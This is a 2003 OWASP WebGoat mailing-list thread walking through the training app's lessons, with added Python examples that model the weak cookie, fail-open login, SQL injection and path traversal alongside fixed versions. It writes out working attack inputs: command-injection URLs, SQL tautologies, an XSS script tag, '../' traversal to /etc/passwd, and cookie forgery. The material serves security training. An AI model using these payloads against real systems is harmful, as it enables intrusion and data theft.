[OWASP-WEBGOAT]WebGoat Walkthru? (May be a spoiler, so if you haven't completed the lessons, you may not want to look at it)

Dawes, Rogan (ZA - Johannesburg) rdawes at deloitte.co.za
Thu Nov 20 02:59:20 EST 2003


Hi Jeremy,
 
You seem to have got everything covered so far.
 
In response to a couple of your questions:
 
BUT I FOUND THIS TO BE INTERESTING:  I stopped tomcat (java crash) and
reconnected to webgoat, and look what Tomcat threw out...this was actually
kind of funny... 

<snip> 
Successful connection to null 
http8080-Processor4 DROP TABLE user_data 
http8080-Processor4 CREATE TABLE user_data (userid varchar(5) not null
primary key,first_name varcha 


This is done every time that WebGoat starts up, to make sure that you have a
clean database to work from. Obviously this would not happen in any kind of
production system ;-)

WEAK AUTHENTICATION COOKIE:  This one was neat, because it had a little
crypt-o-gram type puzzle (jeff/jeff creates the cookie ggfkggfk whereas
dave/dave creates the cookie fwbefwbe, they're reversed and incremented by 1
letter).  This didn't actually buy us anything as far as I can tell, except
the 'AuthCookie'.  I logged in with jeff/jeff and upon logging out, I noticed
that the cookie had an 'AuthCookie=ggfkggfk' so I put it in the Cookie field
of PenProxy and it worked:

 

The key to this one is that if you start up webgoat, and supply a cookie of
"ggfkggfk", without ever trying to authenticate, you will be recognised as
Jeff, and fwbefwbe will get you access to Dave's account. The cookie IS
authentication, by itself.

 

Good going!

Rogan

P.S. to the WebGoat folks, perhaps you might want to mention WebScarab as a
tool that folks can use in their investigations of WebGoat?
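
The cookie transform Rogan describes above, as an added example that is not
part of the original thread and not WebGoat's own code (WebGoat is Java; this
is a Python model). It assumes the cookie is username + password, reversed,
with each letter shifted forward by one and wrapping z to a; that assumption
reproduces both data points in the thread (jeff/jeff -> ggfkggfk, dave/dave ->
fwbefwbe), though since username equals password in both samples it cannot be
distinguished from "username repeated twice". The user table is constructed
from the user_system_data rows in the Tomcat log quoted further down.

```python
# Added example (not WebGoat's code): model of the weak AuthCookie transform.
# Assumption: cookie = shift_by_one(reverse(username + password)), a-z wrapping.
import string

LOWER = string.ascii_lowercase


def shift_letters(text: str, delta: int) -> str:
    """Shift a-z by delta positions with wrap-around; leave other characters alone."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + delta) % 26])
        else:
            out.append(ch)
    return "".join(out)


def encode_cookie(username: str, password: str) -> str:
    """Mint the AuthCookie value for a known username/password pair."""
    return shift_letters((username + password)[::-1], 1)


def decode_cookie(cookie: str) -> str:
    """Invert the transform: shift back by one, then reverse."""
    return shift_letters(cookie, -1)[::-1]


# Constructed from the user_system_data rows in the Tomcat log quoted below.
USERS = {
    "jblow": "passwd1", "jdoe": "passwd2", "jplane": "passwd3",
    "jeff": "jeff", "dave": "dave",
}


def user_for_cookie(cookie: str):
    """Model of a server that treats the cookie as the credential: any cookie that
    decodes to a known username+password pair is 'logged in' with no further check."""
    plain = decode_cookie(cookie)
    for name, pw in USERS.items():
        if plain == name + pw:
            return name
    return None


if __name__ == "__main__":
    for user, pw in (("jeff", "jeff"), ("dave", "dave")):
        c = encode_cookie(user, pw)
        print(f"{user}/{pw} -> AuthCookie={c} -> recognised as {user_for_cookie(c)}")
    # Anyone who works out the transform can mint a cookie for any account
    # without ever submitting the login form.
    print("forged for jblow:", encode_cookie("jblow", "passwd1"))
```

The point of user_for_cookie is Rogan's: the cookie is the whole credential,
so a reversible transform of the password is no better than sending the
password itself. A session identifier should be a random value that the
server maps to a user, not something derivable from the account.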

 
 

-----Original Message-----
From: Jeremy Junginger [mailto:jj at act.com] 
Sent: 19 November 2003 07:33 PM
To: owasp-webgoat at lists.sourceforge.net
Subject: [OWASP-WEBGOAT]WebGoat Walkthru? (May be a spoiler, so if you
haven't completed the lessons, you may not want to look at it)



Hey guys, this is my first post to the group.  I have been getting familiar
with WebGoat and am about to play with the challenges, but I wanted to make
sure I'm on the right track before I continue.  Thanks!

TOOLS USED: 
PenProxy (HTTP Proxy that allows modification of many fields) 
Achilles (Another HTTP Proxy that was suggested) 
HTTrack (Tool for spidering websites) 
FormScalpel (Form manipulation and more) 

WALK-THRU?!?: 

HTTP BASICS:  I looked at this one for a couple hours before I decided it is
just a tutorial on HTTP.
EXPLOIT: N/A (I may have missed something here)

FAIL OPEN AUTHENTICATION:  This one took forever....the hints led me to
removing the password parameter, and "VIEW SOURCE" gave me the author's name
"jeff", so I tried jeff with "jeff" first just to see if it worked, and
voila, but more interesting is the fact that if you omit the password
parameter completely and supply a valid username (in this case, "jeff") it
authenticates anyways.
EXPLOIT:
http://127.0.0.1:8080/WebGoat/attack?Username=jeff
or
http://127.0.0.1:8080/WebGoat/attack?Username=jeff&Password=jeff

HTML CLUES:  This was pretty much a gimme.  
<snip> 
    FIXME admin:adminpw 
</snip> 
EXPLOIT:
http://127.0.0.1:8080/WebGoat/attack?Username=admin&Password=adminpw
which also yields:
http://127.0.0.1:8080/WebGoat/attack?Username=jblow&Password=passwd1
that also allows you to log in.

PARAMETER INJECTION:  This one was pretty funny.  It reminded me of the
directory traversal/Unicode (ala NIMDA/CR/CR2) exploits.  The &, &&, |, and
|| can be used to run additional commands that are available in the shell.
EXPLOIT (examples):
http://127.0.0.1:8080/WebGoat/attack?dir=&ipconfig&netstat
or enter the following in the form: 
&ipconfig&netstat&ping 127.0.0.1 

UNCHECKED EMAIL:  I'm not sure I get this one.  I see that you can send
malicious html emails, but didn't find much else.  I used:
EXPLOIT?:
TO:test at test.xom
MESSAGE:<A href="http://www.playboy.com/">http://www.google.com</A>

SQL INJECTION:  This is a subject I am still pretty new at, but I took a
look at "SQL Injection" by Kevin Spett of SPI LABS, which led me to try
inserting an "always true" statement (1=1):
EXPLOIT: 
Enter an account number:' or 1=1 
or 
Enter an account number:' or 0=0 
:) 

THREAD SAFETY:  I used the hints, and saw that if you open the two browsers
(and click fast enough) one user's account gets sent to both userids.  Bad
stuff there.  I wouldn't want to see that in production...heheh

WEAK AUTHENTICATION COOKIE:  This one was neat, because it had a little
crypt-o-gram type puzzle (jeff/jeff creates the cookie ggfkggfk whereas
dave/dave creates the cookie fwbefwbe, they're reversed and incremented by 1
letter).  This didn't actually buy us anything as far as I can tell, except
the 'AuthCookie'.  I logged in with jeff/jeff and upon logging out, I noticed
that the cookie had an 'AuthCookie=ggfkggfk' so I put it in the Cookie field
of PenProxy and it worked:

EXPLOIT: 
Using PenProxy, I added 'AuthCookie=ggfkggfk;' to the Cookie field 
BUT I FOUND THIS TO BE INTERESTING:  I stopped tomcat (java crash) and
reconnected to webgoat, and look what Tomcat threw out...this was actually
kind of funny...

<snip>
Successful connection to null
http8080-Processor4 DROP TABLE user_data
http8080-Processor4 CREATE TABLE user_data (userid varchar(5) not null primary key,first_name varchar(20),last_name varchar(20),cc_number varchar(30),cc_type varchar(10),)
http8080-Processor4 INSERT INTO user_data VALUES ('101','Joe','Blow','987654321','VISA')
http8080-Processor4 INSERT INTO user_data VALUES ('101','Joe','Blow','222200001111','MC')
http8080-Processor4 INSERT INTO user_data VALUES ('102','John','Doe','222200002222','MC')
http8080-Processor4 INSERT INTO user_data VALUES ('102','John','Doe','222200002222','AMEX')
http8080-Processor4 INSERT INTO user_data VALUES ('103','Jane','Plane','123456789','MC')
http8080-Processor4 INSERT INTO user_data VALUES ('103','Jane','Plane','333300003333','AMEX')
http8080-Processor4 DROP TABLE user_system_data
http8080-Processor4 CREATE TABLE user_system_data (userid varchar(5) not null primary key,user_name varchar(12),password varchar(10),cookie varchar(30),)
http8080-Processor4 INSERT INTO user_system_data VALUES ('101','jblow','passwd1', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('104','jeff','jeff', '')
http8080-Processor4 INSERT INTO user_system_data VALUES ('105','dave','dave', '')
http8080-Processor4 DROP TABLE product_system_data
http8080-Processor4 CREATE TABLE product_system_data (productid varchar(6) not null primary key,product_name varchar(20),price varchar(10),)
http8080-Processor4 INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')
http8080-Processor4 INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')
http8080-Processor4 DROP TABLE messages
http8080-Processor4 CREATE TABLE messages (num int not null primary key,title varchar(50),message varchar(1000),)
Success: creating tables.
Successfully refreshed the database.
Wed Nov 19 11:05:08 GMT-07:00 2003 | x.x.x:x.x.x.x | WelcomeScreen | [Username=jeff,Password=jeff]
</snip>
(Is that cheating?  I think it may be) 

DATABASE XSS:  I just tried standard java "alert" messages, and found that
if you put the following in the message field and view it, it runs the code.

EXPLOIT: 
Message: <script language="javascript" type="text/javascript">alert("Put Malware Here");</script>
(Then click on message to view) 

HIDDEN FIELD TAMPERING:  I think I'm missing something here.  I saw that you
can just pass the price parameter as any number you want, so I just modified
the price parameter and got a television for .01, what a bargain!

EXPLOIT: 
http://10.40.32.111:8080/WebGoat/attack?Price=.01

WEAK ACCESS CONTROL (SHOULD BE DIRECTORY TRAVERSAL?): All I could find on
this one was that it allowed directory traversal.  Pretty much trial and
error on this one.  Anyone find this another way?

EXPLOIT: 
Filename:../ 
or 
Filename:../../ 
grants access to TOP SECRET stuff. 

CHALLENGES:  I am getting ready to work on these.  But I wanted to make sure
I haven't overlooked any obvious stuff in the above exercises.  Thanks for
your input on this, and have a great day!

-Jeremy 
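
The FAIL OPEN AUTHENTICATION behaviour from the walkthrough above, as an added
example that is not part of the original post and not WebGoat's code (a
Python model rather than the Java servlet). The handler logic is an assumption
that reproduces what is described: a request with a valid Username and no
Password parameter at all is accepted. The user table is constructed from the
user_system_data rows in the Tomcat log in the post.

```python
# Added example (not WebGoat's code): fail-open login check beside a fail-closed one.
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed from the user_system_data INSERTs in the Tomcat log.
USERS = {
    "jblow": "passwd1", "jdoe": "passwd2", "jplane": "passwd3",
    "jeff": "jeff", "dave": "dave",
}


def params_from_url(url: str) -> dict:
    """First value of each query parameter, as a servlet's getParameter() returns it.
    parse_qs drops empty values, so 'Password=' counts as absent here."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def login_fail_open(params: dict) -> bool:
    """Vulnerable (assumed logic): the password is only compared when the
    parameter is present, so a request that never sends Password is accepted."""
    username = params.get("Username")
    password = params.get("Password")
    if username not in USERS:
        return False
    if password is not None and password != USERS[username]:
        return False
    return True  # reached with password is None: fail open


def login_fail_closed(params: dict) -> bool:
    """Fixed: every path that does not positively verify the credential denies."""
    username = params.get("Username")
    password = params.get("Password")
    if not username or not password:
        return False
    expected = USERS.get(username)
    if expected is None:
        return False
    return hmac.compare_digest(expected.encode(), password.encode())


if __name__ == "__main__":
    base = "http://127.0.0.1:8080/WebGoat/attack"
    for url in (f"{base}?Username=jeff",
                f"{base}?Username=jeff&Password=jeff",
                f"{base}?Username=jeff&Password=wrong"):
        p = params_from_url(url)
        print(f"{url}\n  fail-open: {login_fail_open(p)}   fail-closed: {login_fail_closed(p)}")
```

The defect is structural rather than a typo: the vulnerable version's only
"deny" branches are for a bad username or a wrong password, so every other
path, including "no password sent", falls through to success. The fixed
version has a single success path that requires a positive match.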
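
The always-true injection from the SQL INJECTION section, as an added example
that is not part of the original post and not WebGoat's code. It runs a
constructed in-memory SQLite copy of the user_data table (rows taken from the
INSERT statements in the Tomcat log in the post; the primary-key constraint
is dropped because that log inserts userid 101, 102 and 103 twice each)
through a string-concatenated query and a parameterised one. In this
constructed query the value is wrapped in single quotes, so the bare
"' or 1=1" from the post would leave the closing quote unbalanced; the two
payloads here close it or comment it out. Which exact string works against a
real application depends on how it assembles the statement.

```python
# Added example (not WebGoat's code): tautology injection vs. a bound parameter.
import sqlite3

USER_DATA_ROWS = [  # constructed from the log's INSERT statements
    ("101", "Joe", "Blow", "987654321", "VISA"),
    ("101", "Joe", "Blow", "222200001111", "MC"),
    ("102", "John", "Doe", "222200002222", "MC"),
    ("102", "John", "Doe", "222200002222", "AMEX"),
    ("103", "Jane", "Plane", "123456789", "MC"),
    ("103", "Jane", "Plane", "333300003333", "AMEX"),
]

COLUMNS = "userid, first_name, last_name, cc_number, cc_type"


def build_db() -> sqlite3.Connection:
    """In-memory copy of user_data (no primary key: the log has duplicate userids)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (userid varchar(5), first_name varchar(20), "
        "last_name varchar(20), cc_number varchar(30), cc_type varchar(10))"
    )
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?, ?)", USER_DATA_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, account: str) -> list:
    """Vulnerable: the account number is spliced into the statement text,
    so a value containing a quote rewrites the WHERE clause."""
    sql = f"SELECT {COLUMNS} FROM user_data WHERE userid = '{account}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, account: str) -> list:
    """Fixed: the value travels as a bound parameter and is never parsed as SQL."""
    sql = f"SELECT {COLUMNS} FROM user_data WHERE userid = ?"
    return conn.execute(sql, (account,)).fetchall()


# Two tautologies: the first closes the dangling quote, the second comments it out.
PAYLOADS = ["' or '1'='1", "' or 1=1 --"]


def compare(conn: sqlite3.Connection, account: str) -> tuple:
    """Row counts returned by the two implementations for the same input."""
    return len(lookup_vulnerable(conn, account)), len(lookup_safe(conn, account))


if __name__ == "__main__":
    db = build_db()
    for value in ["101"] + PAYLOADS:
        vuln, safe = compare(db, value)
        print(f"{value!r:16} vulnerable -> {vuln} rows, parameterised -> {safe} rows")
```

With a bound parameter the payload is compared as a literal userid and matches
nothing; the concatenated version returns every row, card numbers included.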
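
The "../" and "../../" trick from the WEAK ACCESS CONTROL section, as an added
example that is not part of the original post and not WebGoat's code. The
base directory is a hypothetical value, and pure path arithmetic (posixpath)
is used so the example needs no files on disk; it shows where the supplied
Filename actually resolves and the containment check that rejects anything
outside the intended directory.

```python
# Added example (not WebGoat's code): directory traversal and a containment check.
import posixpath

BASE_DIR = "/opt/webgoat/files"  # hypothetical directory the lesson serves files from


def resolve_vulnerable(filename: str) -> str:
    """Joins the user-supplied name onto the base directory and normalises it.
    '..' segments walk upward; an absolute name replaces the base entirely."""
    return posixpath.normpath(posixpath.join(BASE_DIR, filename))


def resolve_safe(filename: str) -> str:
    """Resolves the same way, then refuses anything that left BASE_DIR.
    The trailing '/' in the prefix test stops '/opt/webgoat/filesx' from passing."""
    target = resolve_vulnerable(filename)
    if target != BASE_DIR and not target.startswith(BASE_DIR + "/"):
        raise PermissionError(f"{filename!r} resolves to {target}, outside {BASE_DIR}")
    return target


def is_contained(filename: str) -> bool:
    """True when the name stays inside BASE_DIR after normalisation."""
    try:
        resolve_safe(filename)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    for name in ("report.txt", "../", "../../", "../../../etc/passwd", "/etc/passwd"):
        print(f"{name!r:24} -> {resolve_vulnerable(name):28} contained={is_contained(name)}")
```

On a real server do the same check on os.path.realpath() of the joined path
so that symlinks inside the directory cannot point back out of it; the
normalisation here is enough to show why "../../" reaches two levels up.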

  
